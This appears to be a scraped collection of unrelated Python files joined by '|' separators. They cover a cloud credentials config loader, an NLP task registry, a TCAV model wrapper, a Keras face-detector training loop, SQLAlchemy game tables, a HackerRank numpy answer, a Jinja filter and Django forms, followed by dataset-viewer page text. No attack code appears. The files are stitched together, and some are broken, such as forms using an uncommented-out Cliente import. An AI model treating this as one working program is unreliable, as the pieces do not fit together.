credentials_type = config_dict.get(env_const.ENV_CREDENTIALS_TYPE_KEY)
access_key_id = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_KEY_ID_KEY)
access_secret = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_SECRET_KEY)
check_config_param(credentials_type, env_const.ENV_CREDENTIALS_TYPE_KEY)
region_ids = config_dict.get(env_const.ENV_CACHE_CLIENT_REGION_ID_KEY)
check_config_param(region_ids, env_const.ENV_CACHE_CLIENT_REGION_ID_KEY)
try:
region_dict_list = json.loads(region_ids)
for region_dict in region_dict_list:
region_info_list.append(RegionInfo(
None if region_dict.get(
env_const.ENV_REGION_REGION_ID_NAME_KEY) == '' else region_dict.get(
env_const.ENV_REGION_REGION_ID_NAME_KEY),
region_dict.get(env_const.ENV_REGION_VPC_NAME_KEY),
None if region_dict.get(
env_const.ENV_REGION_ENDPOINT_NAME_KEY) == '' else region_dict.get(
env_const.ENV_REGION_ENDPOINT_NAME_KEY)))
except Exception:
raise ValueError(
("config param.get(%s) is illegal" % env_const.ENV_CACHE_CLIENT_REGION_ID_KEY))
if credentials_type == "ak":
check_config_param(access_key_id, env_const.ENV_CREDENTIALS_ACCESS_KEY_ID_KEY)
check_config_param(access_secret, env_const.ENV_CREDENTIALS_ACCESS_SECRET_KEY)
credential = credentials.AccessKeyCredential(access_key_id, access_secret)
elif credentials_type == "token":
access_token_id = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_TOKEN_ID_KEY)
access_token = config_dict.get(env_const.ENV_CREDENTIALS_ACCESS_TOKEN_KEY)
check_config_param(access_token_id, env_const.ENV_CREDENTIALS_ACCESS_TOKEN_ID_KEY)
check_config_param(access_token, env_const.ENV_CREDENTIALS_ACCESS_TOKEN_KEY)
credential = credentials.AccessKeyCredential(access_token_id, access_token)
elif credentials_type == "ram_role" or credentials_type == "sts":
role_session_name = config_dict.get(env_const.ENV_CREDENTIALS_ROLE_SESSION_NAME_KEY)
role_arn = config_dict.get(env_const.ENV_CREDENTIALS_ROLE_ARN_KEY)
check_config_param(access_key_id, env_const.ENV_CREDENTIALS_ACCESS_KEY_ID_KEY)
check_config_param(access_secret, env_const.ENV_CREDENTIALS_ACCESS_SECRET_KEY)
check_config_param(role_session_name, env_const.ENV_CREDENTIALS_ROLE_SESSION_NAME_KEY)
check_config_param(role_arn, env_const.ENV_CREDENTIALS_ROLE_ARN_KEY)
credential = credentials.RamRoleArnCredential(access_key_id, access_secret,
role_arn, role_session_name)
elif credentials_type == "ecs_ram_role":
role_name = config_dict.get(env_const.ENV_CREDENTIALS_ROLE_NAME_KEY)
check_config_param(role_name, env_const.ENV_CREDENTIALS_ROLE_NAME_KEY)
credential = credentials.EcsRamRoleCredential(role_name)
elif credentials_type == "client_key":
client_key_path = config_dict.get(env_const.EnvClientKeyPrivateKeyPathNameKey)
check_config_param(client_key_path, env_const.EnvClientKeyPrivateKeyPathNameKey)
password = client_key_utils.get_password(config_dict)
cred, signer = client_key_utils.load_rsa_key_pair_credential_and_client_key_signer(
client_key_path, password)
credential = ClientKeyCredential(signer, cred)
else:
raise ValueError(("config param.get(%s) is illegal" % env_const.ENV_CREDENTIALS_TYPE_KEY))
secret_names = config_dict.get(const.PROPERTIES_SECRET_NAMES_KEY)
if secret_names != "" and secret_names is not None:
secret_name_list.extend(secret_names.split(","))
credential_properties = CredentialsProperties(credential, secret_name_list, region_info_list, config_dict)
return credential_properties
return None
|
# flake8: noqa
"""
__init__.py for import child .py files
isort:skip_file
"""
# Utility classes & functions
import pororo.tasks.utils
from pororo.tasks.utils.download_utils import download_or_load
from pororo.tasks.utils.base import (
PororoBiencoderBase,
PororoFactoryBase,
PororoGenerationBase,
PororoSimpleBase,
PororoTaskGenerationBase,
)
# Factory classes
from pororo.tasks.age_suitability import PororoAgeSuitabilityFactory
from pororo.tasks.automated_essay_scoring import PororoAesFactory
from pororo.tasks.automatic_speech_recognition import PororoAsrFactory
from pororo.tasks.collocation import PororoCollocationFactory
from pororo.tasks.constituency_parsing import PororoConstFactory
from pororo.tasks.dependency_parsing import PororoDpFactory
from pororo.tasks.fill_in_the_blank import PororoBlankFactory
from pororo.tasks.grammatical_error_correction import PororoGecFactory
from pororo.tasks.grapheme_conversion import PororoP2gFactory
from pororo.tasks.image_captioning import PororoCaptionFactory
from pororo.tasks.morph_inflection import PororoInflectionFactory
from pororo.tasks.lemmatization import PororoLemmatizationFactory
from pororo.tasks.named_entity_recognition import PororoNerFactory
from pororo.tasks.natural_language_inference import PororoNliFactory
from pororo.tasks.optical_character_recognition import PororoOcrFactory
from pororo.tasks.paraphrase_generation import PororoParaphraseFactory
from pororo.tasks.paraphrase_identification import PororoParaIdFactory
from pororo.tasks.phoneme_conversion import PororoG2pFactory
from pororo.tasks.pos_tagging import PororoPosFactory
from pororo.tasks.question_generation import PororoQuestionGenerationFactory
from pororo.tasks.machine_reading_comprehension import PororoMrcFactory
from pororo.tasks.semantic_role_labeling import PororoSrlFactory
from pororo.tasks.semantic_textual_similarity import PororoStsFactory
from pororo.tasks.sentence_embedding import PororoSentenceFactory
from pororo.tasks.sentiment_analysis import PororoSentimentFactory
from pororo.tasks.contextualized_embedding import PororoContextualFactory
from pororo.tasks.text_summarization import PororoSummarizationFactory
from pororo.tasks.tokenization import PororoTokenizationFactory
from pororo.tasks.machine_translation import PororoTranslationFactory
from pororo.tasks.word_embedding import PororoWordFactory
from pororo.tasks.word_translation import PororoWordTranslationFactory
from pororo.tasks.zero_shot_classification import PororoZeroShotFactory
from pororo.tasks.review_scoring import PororoReviewFactory
from pororo.tasks.speech_translation import PororoSpeechTranslationFactory
|
from . import algorithms, buffers, noise, transition
__all__ = ["algorithms", "buffers", "noise", "transition"]
|
"""Copyright 2018 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from abc import ABCMeta
from abc import abstractmethod
from six.moves import zip
import numpy as np
import six
import tensorflow as tf
from google.protobuf import text_format
class ModelWrapper(six.with_metaclass(ABCMeta, object)):
"""Simple wrapper of the for models with session object for TCAV.
Supports easy inference with no need to deal with the feed_dicts.
"""
@abstractmethod
def __init__(self, model_path=None, node_dict=None):
"""Initialize the wrapper.
Optionally create a session, load
the model from model_path to this session, and map the
input/output and bottleneck tensors.
Args:
model_path: one of the following: 1) Directory path to checkpoint 2)
Directory path to SavedModel 3) File path to frozen graph.pb 4) File
path to frozen graph.pbtxt
node_dict: mapping from a short name to full input/output and bottleneck
tensor names. Users should pass 'input' and 'prediction'
as keys and the corresponding input and prediction tensor
names as values in node_dict. Users can additionally pass bottleneck
tensor names for which gradient Ops will be added later.
"""
# A dictionary of bottleneck tensors.
self.bottlenecks_tensors = None
# A dictionary of input, 'logit' and prediction tensors.
self.ends = None
# The model name string.
self.model_name = None
# a place holder for index of the neuron/class of interest.
# usually defined under the graph. For example:
# with g.as_default():
# self.tf.placeholder(tf.int64, shape=[None])
self.y_input = None
# The tensor representing the loss (used to calculate derivative).
self.loss = None
# If tensors in the loaded graph are prefixed with 'import/'
self.import_prefix = False
if model_path:
self._try_loading_model(model_path)
if node_dict:
self._find_ends_and_bottleneck_tensors(node_dict)
def _try_loading_model(self, model_path):
""" Load model from model_path.
TF models are often saved in one of the three major formats:
1) Checkpoints with ckpt.meta, ckpt.data, and ckpt.index.
2) SavedModel format with saved_model.pb and variables/.
3) Frozen graph in .pb or .pbtxt format.
When model_path is specified, model is loaded in one of the
three formats depending on the model_path. When model_path is
ommitted, child wrapper is responsible for loading the model.
"""
try:
self.sess = tf.Session(graph=tf.Graph())
with self.sess.graph.as_default():
if tf.io.gfile.isdir(model_path):
ckpt = tf.train.latest_checkpoint(model_path)
if ckpt:
tf.compat.v1.logging.info('Loading from the latest checkpoint.')
saver = tf.train.import_meta_graph(ckpt + '.meta')
saver.restore(self.sess, ckpt)
else:
tf.compat.v1.logging.info('Loading from SavedModel dir.')
tf.saved_model.loader.load(self.sess, ['serve'], model_path)
else:
input_graph_def = tf.compat.v1.GraphDef()
if model_path.endswith('.pb'):
tf.compat.v1.logging.info('Loading from frozen binary graph.')
with tf.io.gfile.GFile(model_path, 'rb') as f:
input_graph_def.ParseFromString(f.read())
else:
tf.compat.v1.logging.info('Loading from frozen text graph.')
with tf.io.gfile.GFile(model_path) as f:
text_format.Parse(f.read(), input_graph_def)
tf.import_graph_def(input_graph_def)
self.import_prefix = True
except Exception as e:
template = 'An exception of type {0} occurred ' \
'when trying to load model from {1}. ' \
'Arguments:\n{2!r}'
tf.compat.v1.logging.warn(template.format(type(e).__name__, model_path, e.args))
def _find_ends_and_bottleneck_tensors(self, node_dict):
""" Find tensors from the graph by their names.
Depending on how the model is loaded, tensors in the graph
may or may not have 'import/' prefix added to every tensor name.
This is true even if the tensors already have 'import/' prefix.
The 'ends' and 'bottlenecks_tensors' dictionary should map to tensors
with the according name.
"""
self.bottlenecks_tensors = {}
self.ends = {}
for k, v in six.iteritems(node_dict):
if self.import_prefix:
v = 'import/' + v
tensor = self.sess.graph.get_operation_by_name(v.strip(':0')).outputs[0]
if k == 'input' or k == 'prediction':
self.ends[k] = tensor
else:
self.bottlenecks_tensors[k] = tensor
def _make_gradient_tensors(self):
"""Makes gradient tensors for all bottleneck tensors."""
self.bottlenecks_gradients = {}
for bn in self.bottlenecks_tensors:
self.bottlenecks_gradients[bn] = tf.gradients(
self.loss, self.bottlenecks_tensors[bn])[0]
def get_gradient(self, acts, y, bottleneck_name, example):
"""Return the gradient of the loss with respect to the bottleneck_name.
Args:
acts: activation of the bottleneck
y: index of the logit layer
bottleneck_name: name of the bottleneck to get gradient wrt.
example: input example. Unused by default. Necessary for getting gradients
from certain models, such as BERT.
Returns:
the gradient array.
"""
return self.sess.run(self.bottlenecks_gradients[bottleneck_name], {
self.bottlenecks_tensors[bottleneck_name]: acts,
self.y_input: y
})
def get_predictions(self, examples):
"""Get prediction of the examples.
Args:
imgs: array of examples to get predictions
Returns:
array of predictions
"""
return self.adjust_prediction(
self.sess.run(self.ends['prediction'], {self.ends['input']: examples}))
def adjust_prediction(self, pred_t):
"""Adjust the prediction tensor to be the expected shape.
Defaults to a no-op, but necessary to override for GoogleNet
Returns:
pred_t: pred_tensor.
"""
return pred_t
def reshape_activations(self, layer_acts):
"""Reshapes layer activations as needed to feed through the model network.
Override this for models that require reshaping of the activations for use
in TCAV.
Args:
layer_acts: Activations as returned by run_examples.
Returns:
Activations in model-dependent form; the default is a squeezed array (i.e.
at most one dimensions of size 1).
"""
return np.asarray(layer_acts).squeeze()
def label_to_id(self, label):
"""Convert label (string) to index in the logit layer (id).
Override this method if label to id mapping is known. Otherwise,
default id 0 is used.
"""
tf.compat.v1.logging.warn('label_to_id undefined. Defaults to returning 0.')
return 0
def id_to_label(self, idx):
"""Convert index in the logit layer (id) to label (string).
Override this method if id to label mapping is known.
"""
return str(idx)
def run_examples(self, examples, bottleneck_name):
"""Get activations at a bottleneck for provided examples.
Args:
examples: example data to feed into network.
bottleneck_name: string, should be key of self.bottlenecks_tensors
Returns:
Activations in the given layer.
"""
return self.sess.run(self.bottlenecks_tensors[bottleneck_name],
{self.ends['input']: examples})
class ImageModelWrapper(ModelWrapper):
"""Wrapper base class for image models."""
def __init__(self, image_shape):
super(ModelWrapper, self).__init__()
# shape of the input image in this model
self.image_shape = image_shape
def get_image_shape(self):
"""returns the shape of an input image."""
return self.image_shape
class PublicImageModelWrapper(ImageModelWrapper):
"""Simple wrapper of the public image models with session object."""
def __init__(self, sess, model_fn_path, labels_path, image_shape,
endpoints_dict, scope):
super(PublicImageModelWrapper, self).__init__(image_shape)
self.labels = tf.io.gfile.GFile(labels_path).read().splitlines()
self.ends = PublicImageModelWrapper.import_graph(
model_fn_path, endpoints_dict, self.image_value_range, scope=scope)
self.bottlenecks_tensors = PublicImageModelWrapper.get_bottleneck_tensors(
scope)
graph = tf.compat.v1.get_default_graph()
# Construct gradient ops.
with graph.as_default():
self.y_input = tf.compat.v1.placeholder(tf.int64, shape=[None])
self.pred = tf.expand_dims(self.ends['prediction'][0], 0)
self.loss = tf.reduce_mean(
tf.compat.v1.nn.softmax_cross_entropy_with_logits_v2(
labels=tf.one_hot(
self.y_input,
self.ends['prediction'].get_shape().as_list()[1]),
logits=self.pred))
self._make_gradient_tensors()
def id_to_label(self, idx):
return self.labels[idx]
def label_to_id(self, label):
return self.labels.index(label)
@staticmethod
def create_input(t_input, image_value_range):
"""Create input tensor."""
def forget_xy(t):
"""Forget sizes of dimensions [1, 2] of a 4d tensor."""
zero = tf.identity(0)
return t[:, zero:, zero:, :]
t_prep_input = t_input
if len(t_prep_input.shape) == 3:
t_prep_input = tf.expand_dims(t_prep_input, 0)
t_prep_input = forget_xy(t_prep_input)
lo, hi = image_value_range
t_prep_input = lo + t_prep_input * (hi - lo)
return t_input, t_prep_input
# From Alex's code.
@staticmethod
def get_bottleneck_tensors(scope):
"""Add Inception bottlenecks and their pre-Relu versions to endpoints dict."""
graph = tf.compat.v1.get_default_graph()
bn_endpoints = {}
for op in graph.get_operations():
if op.name.startswith(scope + '/') and 'Concat' in op.type:
name = op.name.split('/')[1]
bn_endpoints[name] = op.outputs[0]
return bn_endpoints
# Load graph and import into graph used by our session
@staticmethod
def import_graph(saved_path, endpoints, image_value_range, scope='import'):
t_input = tf.compat.v1.placeholder(np.float32, [None, None, None, 3])
graph = tf.Graph()
assert graph.unique_name(scope, False) == scope, (
'Scope "%s" already exists. Provide explicit scope names when '
'importing multiple instances of the model.') % scope
graph_def = tf.compat.v1.GraphDef.FromString(
tf.io.gfile.GFile(saved_path, 'rb').read())
with tf.name_scope(scope) as sc:
t_input, t_prep_input = PublicImageModelWrapper.create_input(
t_input, image_value_range)
graph_inputs = {}
graph_inputs[endpoints['input']] = t_prep_input
myendpoints = tf.import_graph_def(
graph_def, graph_inputs, list(endpoints.values()), name=sc)
myendpoints = dict(list(zip(list(endpoints.keys()), myendpoints)))
myendpoints['input'] = t_input
return myendpoints
class GoogleNetWrapper_public(PublicImageModelWrapper):
def __init__(self, sess, model_saved_path, labels_path):
image_shape_v1 = [224, 224, 3]
self.image_value_range = (-117, 255 - 117)
endpoints_v1 = dict(
input='input:0',
logit='softmax2_pre_activation:0',
prediction='output2:0',
pre_avgpool='mixed5b:0',
logit_weight='softmax2_w:0',
logit_bias='softmax2_b:0',
)
self.sess = sess
super(GoogleNetWrapper_public, self).__init__(
sess,
model_saved_path,
labels_path,
image_shape_v1,
endpoints_v1,
scope='v1')
self.model_name = 'GoogleNet_public'
def adjust_prediction(self, pred_t):
# Each pred outputs 16, 1008 matrix. The prediction value is the first row.
# Following tfzoo convention.
return pred_t[::16]
class InceptionV3Wrapper_public(PublicImageModelWrapper):
def __init__(self, sess, model_saved_path, labels_path):
self.image_value_range = (-1, 1)
image_shape_v3 = [299, 299, 3]
endpoints_v3 = dict(
input='Mul:0',
logit='softmax/logits:0',
prediction='softmax:0',
pre_avgpool='mixed_10/join:0',
logit_weight='softmax/weights:0',
logit_bias='softmax/biases:0',
)
self.sess = sess
super(InceptionV3Wrapper_public, self).__init__(
sess,
model_saved_path,
labels_path,
image_shape_v3,
endpoints_v3,
scope='v3')
self.model_name = 'InceptionV3_public'
class MobilenetV2Wrapper_public(PublicImageModelWrapper):
def __init__(self, sess, model_saved_path, labels_path):
self.image_value_range = (-1, 1)
image_shape_v2 = [224, 224, 3]
endpoints_v2 = dict(
input='input:0',
prediction='MobilenetV2/Predictions/Reshape:0',
)
self.sess = sess
super(MobilenetV2Wrapper_public, self).__init__(
sess,
model_saved_path,
labels_path,
image_shape_v2,
endpoints_v2,
scope='MobilenetV2')
# define bottleneck tensors and their gradients
self.bottlenecks_tensors = self.get_bottleneck_tensors_mobilenet(
scope='MobilenetV2')
# Construct gradient ops.
g = tf.compat.v1.get_default_graph()
self._make_gradient_tensors()
self.model_name = 'MobilenetV2_public'
@staticmethod
def get_bottleneck_tensors_mobilenet(scope):
"""Add Inception bottlenecks and their pre-Relu versions to endpoints dict."""
graph = tf.compat.v1.get_default_graph()
bn_endpoints = {}
for op in graph.get_operations():
if 'add' in op.name and 'gradients' not in op.name and 'add' == op.name.split(
'/')[-1]:
name = op.name.split('/')[-2]
bn_endpoints[name] = op.outputs[0]
return bn_endpoints
class KerasModelWrapper(ModelWrapper):
""" ModelWrapper for keras models
By default, assumes that your model contains one input node, one output head
and one loss function.
Computes gradients of the output layer in respect to a CAV.
Args:
sess: Tensorflow session we will use for TCAV.
model_path: Path to your model.h5 file, containing a saved trained
model.
labels_path: Path to a file containing the labels for your problem. It
requires a .txt file, where every line contains a label for your
model. You want to make sure that the order of labels in this file
matches with the logits layers for your model, such that file[i] ==
model_logits[i]
"""
def __init__(
self,
sess,
model_path,
labels_path,
):
self.sess = sess
super(KerasModelWrapper, self).__init__()
self.import_keras_model(model_path)
self.labels = tf.io.gfile.GFile(labels_path).read().splitlines()
# Construct gradient ops. Defaults to using the model's output layer
self.y_input = tf.compat.v1.placeholder(tf.int64, shape=[None])
self.loss = self.model.loss_functions[0](self.y_input,
self.model.outputs[0])
self._make_gradient_tensors()
def id_to_label(self, idx):
return self.labels[idx]
def label_to_id(self, label):
return self.labels.index(label)
def import_keras_model(self, saved_path):
"""Loads keras model, fetching bottlenecks, inputs and outputs."""
self.ends = {}
self.model = tf.keras.models.load_model(saved_path)
self.get_bottleneck_tensors()
self.get_inputs_and_outputs_and_ends()
def get_bottleneck_tensors(self):
self.bottlenecks_tensors = {}
layers = self.model.layers
for layer in layers:
if 'input' not in layer.name:
self.bottlenecks_tensors[layer.name] = layer.output
def get_inputs_and_outputs_and_ends(self):
self.ends['input'] = self.model.inputs[0]
self.ends['prediction'] = self.model.outputs[0]
|
from keras.layers import Conv2D, Input,MaxPool2D, Reshape,Activation,Flatten, Dense,concatenate
from keras.models import Model, Sequential
from keras.layers.advanced_activations import PReLU
from keras.optimizers import adam
from keras.utils import to_categorical
import matplotlib.pyplot as plt
import numpy as np
import keras.backend as K
import _pickle as pickle
import random
from keras.activations import relu
from keras.losses import mean_squared_error
import tensorflow as tf
import gc
with open(r'24\cls.imdb','rb') as fid:
cls = pickle.load(fid)
with open(r'24\roi.imdb', 'rb') as fid:
roi = pickle.load(fid)
ims_cls = []
ims_roi = []
cls_score = []
roi_score = []
for (idx, dataset) in enumerate(cls) :
ims_cls.append( np.swapaxes(dataset[0],0,2))
cls_score.append(dataset[1])
for (idx,dataset) in enumerate(roi) :
ims_roi.append( np.swapaxes(dataset[0],0,2))
roi_score.append(dataset[2])
ims_cls = np.array(ims_cls)
ims_roi = np.array(ims_roi)
cls_score = np.array(cls_score)
roi_score = np.array(roi_score)
one_hot_labels = to_categorical(cls_score, num_classes=2)
# input = Input(shape = [12,12,3])
input = Input(shape = [24,24,3]) # change this shape to [None,None,3] to enable arbitraty shape input
x = Conv2D(16,(3,3),strides=1,padding='same',name='conv1')(input)
c1out = PReLU(shared_axes=[1,2],name='prelu1')(x)
c1out = concatenate ([c1out,input],axis=3)
c2input = MaxPool2D(pool_size=3)(c1out)
x = Conv2D(32,(3,3),strides=1,padding='same',name='conv2')(c2input)
c2out = PReLU(shared_axes=[1,2],name='prelu2')(x)
c2out = concatenate([c2out,c2input],axis=3)
c3input = MaxPool2D(pool_size=2)(c2out)
x = Conv2D(64,(3,3),strides=1,padding='same',name='conv3')(c3input)
c3out = PReLU(shared_axes=[1,2],name='prelu3')(x)
c3out = concatenate([c3out,c3input],axis=3)
x = Flatten() (c3out)
x = Dense(128,name='dense1')(x)
x = PReLU(shared_axes=[1],name='prelu4')(x)
classifier = Dense(2, activation='softmax',name='classifier1')(x)
bbox_regress = Dense(4,name='bbox1')(x)
my_adam = adam(lr = 0.001)
for i_train in range(80):
randx=random.choice([0,1,1]) # still need to run manually on each batch
# randx = 4
# randx = random.choice([ 4])
batch_size = 64
print ('currently in training macro cycle: ',i_train)
if i_train ==0:
model = Model([input], [classifier, bbox_regress])
# model.load_weights('model24.h5',by_name=True)
bbox = model.get_layer('bbox1')
bbox_weight = bbox.get_weights()
classifier_dense = model.get_layer('classifier1')
cls_weight = classifier_dense.get_weights()
if 0 == randx:
model = Model([input], [classifier])
model.get_layer('classifier1').set_weights(cls_weight)
model.compile(loss='mse', optimizer=my_adam, metrics=["accuracy"])
model.fit(ims_cls, one_hot_labels, batch_size=batch_size, epochs=1)
classifier_softmax = model.get_layer('classifier1')
cls_weight = classifier_softmax.get_weights()
if 1 == randx:
model = Model([input], [bbox_regress])
model.get_layer('bbox1').set_weights(bbox_weight)
model.compile(loss='mse', optimizer=my_adam, metrics=["accuracy"])
model.fit(ims_roi, roi_score, batch_size=batch_size, epochs=1)
bbox_dense = model.get_layer('bbox1')
bbox_weight = bbox_dense.get_weights()
gc.collect()
def savemodel():
model = Model([input], [classifier, bbox_regress])
model.get_layer('bbox1').set_weights(bbox_weight)
model.get_layer('classifier1').set_weights(cls_weight)
model.save_weights('model24.h5')
savemodel()
|
import enum
from sqlalchemy import Column, VARCHAR, Integer, Boolean, TIMESTAMP, ForeignKey, CheckConstraint
from sqlalchemy.orm import relationship
from sqlalchemy.sql import func
from sqlalchemy.ext.hybrid import hybrid_property
# local imports
from .base import Base
class GameStatuses(enum.Enum):
"""Holds info about current status"""
ready = 'ready' # App/env started
initiated = 'initiated' # Game initiated
players_decision = 'players_decision' # Players still making card picks
judge_decision = 'judge_decision' # Judge yet to choose winner
end_round = 'end_round' # Round ended
ended = 'ended' # Game ended
class TableGames(Base):
"""games table - stores past game info"""
__tablename__ = 'games'
id = Column(Integer, primary_key=True, autoincrement=True)
rounds = relationship('TableGameRounds', back_populates='game')
start_time = Column(TIMESTAMP, server_default=func.now(), nullable=False)
last_update = Column(TIMESTAMP, onupdate=func.now(), server_default=func.now())
end_time = Column(TIMESTAMP, nullable=True)
@hybrid_property
def duration(self):
return self.end_time - self.start_time if self.end_time is not None else self.last_update - self.start_time
class TableGameRounds(Base):
"""gamerounds table - stores past gameround info"""
__tablename__ = 'gamerounds'
id = Column(Integer, primary_key=True, autoincrement=True)
game_id = Column(Integer, ForeignKey('games.id'), nullable=False)
game = relationship("TableGames", back_populates='rounds')
start_time = Column(TIMESTAMP, server_default=func.now(), nullable=False)
end_time = Column(TIMESTAMP, nullable=True)
@hybrid_property
def duration(self):
return self.end_time - self.start_time if self.end_time is not None else None
class TablePlayerRounds(Base):
"""player-level game info"""
__tablename__ = 'playerrounds'
id = Column(Integer, primary_key=True, autoincrement=True)
player_id = Column(Integer, ForeignKey('players.id'), nullable=False)
player = relationship('TablePlayers', back_populates='rounds')
game_id = Column(Integer, ForeignKey('games.id'), nullable=False)
round_id = Column(Integer, ForeignKey('gamerounds.id'), nullable=False)
score = Column(Integer, default=0, nullable=False)
is_picked = Column(Boolean, default=False, nullable=False)
is_judge = Column(Boolean, default=False, nullable=False)
is_arp = Column(Boolean, default=False, nullable=False)
is_arc = Column(Boolean, default=False, nullable=False)
is_nuked_hand = Column(Boolean, default=False, nullable=False)
is_nuked_hand_caught = Column(Boolean, default=False, nullable=False)
class TableGameSettings(Base):
"""gamesettings table - """
__tablename__ = 'gamesettings'
__table_args__ = (
CheckConstraint('id < 2', name='settings_row_limit1'),
)
id = Column(Integer, primary_key=True, autoincrement=True)
is_ping_winner = Column(Boolean, default=True, nullable=False)
is_ping_judge = Column(Boolean, default=True, nullable=False)
decknuke_penalty = Column(Integer, default=-3, nullable=False)
judge_order_divider = Column(VARCHAR, default=':finger-wag-right:', nullable=False)
last_update = Column(TIMESTAMP, onupdate=func.now())
|
# Problem: https://www.hackerrank.com/challenges/np-mean-var-and-std/problem
# Score: 20.0
import numpy as np
n,m = map(int, input().split())
my_array = np.array([input().strip().split() for _ in range(n)], int)
print(np.mean(my_array, axis=1), np.var(my_array, axis=0), np.around(np.std(my_array), decimals=11), sep='\n')
|
import re
from moban.plugins.jinja2.extensions import JinjaFilter
GITHUB_REF_PATTERN = "`([^`]*?#[0-9]+)`"
ISSUE = "^.*?" + GITHUB_REF_PATTERN + ".*?$"
SAME_PROJ_FULL_ISSUE = "`#{3} <https://github.com/{0}/{1}/{2}/{3}>`_"
DIFF_PROJ_FULL_ISSUE = "`{1}#{3} <https://github.com/{0}/{1}/{2}/{3}>`_"
PULL_REQUEST = "PR"
PULL = "pull"
ISSUES = "issues"
@JinjaFilter()
def github_expand(line, name, organisation):
result = re.match(ISSUE, line)
if result:
github_thing = result.group(1)
tokens = github_thing.split("#")
if len(tokens) == 4:
if tokens[2] == PULL_REQUEST:
tokens[2] = PULL
else:
tokens[2] = ISSUES
elif len(tokens) == 3:
if tokens[1] == PULL_REQUEST:
tokens = [organisation, tokens[0], PULL, tokens[2]]
else:
tokens = [organisation, tokens[0], ISSUES, tokens[2]]
elif len(tokens) == 2:
if tokens[0] == PULL_REQUEST:
tokens = [organisation, name, PULL] + tokens[1:]
elif tokens[0] != "":
tokens = [organisation, tokens[0], ISSUES] + tokens[1:]
else:
tokens = [organisation, name, ISSUES] + tokens[1:]
if tokens[1] != name:
reference = DIFF_PROJ_FULL_ISSUE.format(*tokens)
else:
reference = SAME_PROJ_FULL_ISSUE.format(*tokens)
return re.sub(GITHUB_REF_PATTERN, reference, line)
else:
return line
|
# -*- encoding: utf-8 -*-
from django import forms
from camara_zona.models import CamaraZona
#from cliente.models import Cliente
from instalacion.models import Instalacion
from monitor.models import Monitor
class MonitorForm(forms.ModelForm):
id = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
#camara_serial = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
#zona_numero = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
clientes = forms.ChoiceField(label=u'Clientes')
class Meta:
model = Monitor
fields = '__all__'
def __init__(self, *args, **kwargs):
super(MonitorForm, self).__init__(*args, **kwargs)
instance = getattr(self, 'instance', None)
if instance and instance._id:
self.fields["id"].initial = str(instance._id)
self.fields["clientes"].choices = [(str(c._id), c.razon_social) for c in Cliente.objects.all().filter(cliente_estado=True)]
class MonitorEditarForm(forms.ModelForm):
id = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
id_cliente = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
id_instalacion_s = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
#camara_serial = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
#zona_numero = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
clientes = forms.ChoiceField(label=u'Clientes')
instalaciones = forms.ChoiceField(label=u'Instalaciones')
camaras_zonas = forms.ChoiceField(label=u'Camara Zonas')
class Meta:
model = Monitor
fields = '__all__'
def __init__(self, *args, **kwargs):
super(MonitorEditarForm, self).__init__(*args, **kwargs)
instance = getattr(self, 'instance', None)
if instance and instance._id:
self.fields["id"].initial = str(instance._id)
self.fields["id_cliente"].initial = str(instance.id_instalacion.id_cliente._id)
self.fields["clientes"].choices = [(str(c._id), c.razon_social) for c in Cliente.objects.all().filter(cliente_estado=True)]
self.fields["instalaciones"].choices = [(str(c._id), c.nombre_comercial) for c in Instalacion.objects.all().filter(id_cliente=instance.id_instalacion.id_cliente._id, instalacion_estado=True)]
self.fields["camaras_zonas"].choices = [(str(c._id), c.id_camara_zona) for c in CamaraZona.objects.all().filter(id_instalacion=instance.id_instalacion._id, camara_zona_estado=True)]
class MonitorShowForm(forms.ModelForm):
personas = forms.CharField(widget=forms.HiddenInput, required=False, initial=0)
class Meta:
model = Monitor
fields = "__all__"
def __init__(self, *args, **kwargs):
super(MonitorShowForm, self).__init__(*args, **kwargs)
instance = getattr(self, 'instance', None)
self.fields["personas"].initial = "10"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.